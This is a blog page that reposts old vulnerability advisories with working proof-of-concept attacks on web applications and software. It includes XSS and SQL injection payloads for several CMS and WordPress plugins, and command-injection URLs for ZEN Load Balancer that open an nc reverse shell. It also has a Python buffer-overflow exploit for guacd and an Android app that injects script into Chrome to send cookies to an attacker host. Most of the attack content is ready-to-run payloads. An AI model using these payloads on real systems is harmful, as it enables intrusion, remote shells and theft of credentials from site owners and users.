Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863293308

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/55577/info

minimal Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

minimal Gallery 0.8.1 is vulnerable; other versions may also be affected. 

htp://www.example.com/index.php?c=[XSS]
htp://www.example.com/PAth/index.php?s=[XSS]
htp://www.example.com/PAth/index.php?s=y&id=[XSS]
htp://www.example.com/PAth/index.php?m=[XSS]
htp://www.example.com/PAth/index.php?d=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/55653/info

YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
HireHackking 
source: https://www.securityfocus.com/bid/55638/info

ZEN Load Balancer is prone to the following security vulnerabilities:

1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability

An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.

ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable. 

http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/
HireHackking 
source: https://www.securityfocus.com/bid/55622/info

The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected. 

GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1
HireHackking 
source: https://www.securityfocus.com/bid/55619/info

Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E
HireHackking 
source: https://www.securityfocus.com/bid/55605/info

Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Purity 1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>

The "ContactName" ,"email" ,"subject" ,"comments", variables are not
properly sanitized before being used

Exploit:

POST /contact/ HTTP/1.0
Content-Length: 82
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: exploit-masters.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/wordpress/contact/

contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=
HireHackking 
source: https://www.securityfocus.com/bid/55597/info

WordPress is prone to multiple path-disclosure vulnerabilities.

Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.

WordPress 3.4.2 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/t/wordpress/wp-includes/vars.php
http://www.example.com/learn/t/wordpress/wp-includes/update.php
http://www.example.com/learn/t/wordpress/wp-includes/theme.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/rss.php
http:www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/registration.php
http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/post.php
http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
http://www.example.com/learn/t/wordpress/wp-includes/media.php
http://www.example.com/learn/t/wordpress/wp-includes/kses.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
http://www.example.com/learn/t/wordpress/wp-includes/functions.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
HireHackking 
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE: 
# Category: remote

1. Product Description
Extract from the plugin page :
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."

2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter 'size'.
The issue is exploitable even if the plugin is deactivated.

3. Impact Analysis :

The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the Wordpress installation. Collected information may also allow further attacks.

4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)

* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)

* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10

5. Proof of Concept

PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1

6. Vulnerability Timeline
2015-05    : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-08-04 : Response : 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)

7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.

8. Personal Notes

I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-)
HireHackking 
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)

Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data

Vulnerability
================
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.

Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
 

Mitigations
================
Upgrade to version 15.8 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published


Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.
HireHackking 
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team

Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html

1. Introduction

Affected Product:   BigTree CMS 4.2.3  
Fixed in:     4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip  
Vendor Contact:   contribute@bigtreecms.org  
Vulnerability Type:   Multiple SQL Injections  
Remote Exploitable:   Yes  
Reported to vendor:   07/07/2015  
Disclosed to public:   08/07/2015  
Release mode:     Coordinated release  
CVE:       n/a  
Credits     Tim Coen of Curesec GmbH  

2. Vulnerability Description

Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromisation
of the host.

Please note that you have to be authenticated to exploit this issue.

SQL Injection 1

The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.

Proof of Concept (Show all BigTree users):


http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0'
union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from
bigtree_users %23/

Code:

        core/admin/modules/pages/view-tree.php:151; page id is user
controlled
          $nav_visible =
array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
          $nav_hidden =
array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
          $nav_archived = $admin->getArchivedNavigationByParent($page["id"]);

        core/inc/bigtree/admin.php:2638
        static function getArchivedNavigationByParent($parent) {
                [...]
          $q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY
nav_title asc");

        core/inc/bigtree/admin.php:3167
        static function getHiddenNavigationByParent($parent) {
                [...]
          $q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived
!= 'on' ORDER BY nav_title asc");

        core/inc/bigtree/admin.php:3758
        static function getNaturalNavigationByParent($parent,$levels = 1) {
                [...]
          $q = sqlquery("SELECT id,nav_title AS
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND
archived != 'on' ORDER BY position DESC, id ASC");

        core/inc/bigtree/admin.php:4531
        static function getPendingNavigationByParent($parent,$in_nav = true) {
                [...]
          $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE
pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type =
'NEW' ORDER BY date DESC");

SQL Injection 2

When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.

When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.

Proof of Concept:


1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places

Code:

    core/inc/bigtree/admin.php:81
        $f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id =
'".$_SESSION["bigtree_admin"]["id"]."' AND email =
'".$_SESSION["bigtree_admin"]["email"]."'"));

SQL Injection 3 (Blind)

The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.

Proof of Concept:



http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
        POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of
All Sizes


http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
        POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of
All Sizes

Code:

        core/admin/ajax/pages/get-seo-score.php:4:  
            $seo = $admin->getPageSEORating($_POST,$_POST["resources"]);

        core/inc/bigtree/admin.php:4222
            static function getPageSEORating($page,$content) {
                    [...]
              if ($page["title"]) {
                $score += 5;
                // They have a title, let's see if it's unique
                $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE
title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));

3. Solution

To mitigate this issue please upgrade at least to version 4.2.3:

https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip

Please note that a newer version might already be available.

4. Report Timeline

07/07/2015   Informed Vendor about Issue
07/08/2015   Vendor send Fixes for confirmation
07/10/2015   Fixes Confirmed
07/26/2015   Vendor releases Version 4.2.3
08/07/2015   Disclosed to public
HireHackking 
source: https://www.securityfocus.com/bid/55523/info
   
Google Chrome for Android is prone to multiple vulnerabilities.
   
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
   
Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

<body>
     <u>Wait a few seconds.</u>
     <script>
     function doitjs() {
       var xhr = new XMLHttpRequest;
       xhr.onload = function() {
         alert(xhr.responseText);
       };
       xhr.open('GET', document.URL);
       xhr.send(null);
     }
     setTimeout(doitjs, 8000);
     </script>
</body>
HireHackking 
source: https://www.securityfocus.com/bid/55497/info

libguac is prone to a remote buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

#!/usr/bin/python
# CVE-2012-4415: PoC for guacd buffer overflow vulnerability # # Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> # # Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with # default configuration. Uses return-to-libc to bypass non-executable # stack.
#
import socket, struct
PROTOCOL_ADDRESS = 0xbf807e9f
SYSTEM_ADDRESS = 0xb76e7640
class GuacdPOC:
    def __init__(self, command):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect(('localhost', 4822))
        self.s("select")
        self.c(",")
        protocol = (command + "; " + "#" * 265)[:265]
        protocol += struct.pack("L", PROTOCOL_ADDRESS)
        protocol += struct.pack("L", SYSTEM_ADDRESS)
        self.s(protocol)
        self.c(";")
    def s(self, x):
        self.sock.send("%d.%s" % (len(x), x))
    def c(self, x):
        self.sock.send(x)
GuacdPOC("touch /tmp/owned")
HireHackking 
source: https://www.securityfocus.com/bid/55500/info

Openfiler is prone to multiple cross-site scripting and information disclosure vulnerabilities.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Openfiler versions 2.3, 2.99.1 and 2.99.2 are vulnerable; other versions may also be affected. 

https://www.example.com/admin/system.html?step=2&device="><script>alert(document.cookie);</script><p+"

https://www.example.com/admin/volumes_iscsi_targets.html?targetName="><script>alert(document.cookie);</script><p+"

https://www.example.com/phpinfo.html

https://www.example.com/uptime.html
HireHackking 
source: https://www.securityfocus.com/bid/55504/info

FBDj is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/stats/playerdetails.php?id=5'

http://www.example.com/warstats/playerdetails.php?id=13'

http://www.example.com/playerdetails.php?id=9'

http://www.example.com/il2-stats/playerdetails.php?id=29'
HireHackking 
source: https://www.securityfocus.com/bid/55509/info

Atlassian Confluence is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Atlassian Confluence versions prior to 4.1.9 are vulnerable. 

 http://www.example.com/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm
HireHackking 
source: https://www.securityfocus.com/bid/55523/info

Google Chrome for Android is prone to multiple vulnerabilities.

Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.

Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 

package jp.mbsd.terada.attackchrome1;
  
  import android.app.Activity;
  import android.os.Bundle;
  import android.content.Intent;
  import android.net.Uri;
  
  public class Main extends Activity {
      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          setContentView(R.layout.main);
          doit();
      }
  
      // get intent to invoke the chrome app
      public Intent getIntentForChrome(String url) {
          Intent intent = new Intent("android.intent.action.VIEW");
          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
          intent.setData(Uri.parse(url));
          return intent;
      }
  
      public void doit() {
          try {
              // At first, force the chrome app to open a target Web page
              Intent intent1 = getIntentForChrome("http://www.google.com/1");
              startActivity(intent1);
  
              // wait a few seconds
              Thread.sleep(3000);
  
              // JS code to inject into the target (www.google.com)
              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                  + "document.body.appendChild(img);";
  
              Intent intent2 = getIntentForChrome(jsURL);
  
              // Trick to prevent Chrome from opening the JS URL in a different tab
              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
              intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
  
              // Inject JS into the target Web page
              startActivity(intent2);
          }
          catch (Exception e) {}
      }
  }
HireHackking 
source: https://www.securityfocus.com/bid/55523/info
 
Google Chrome for Android is prone to multiple vulnerabilities.
 
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
 
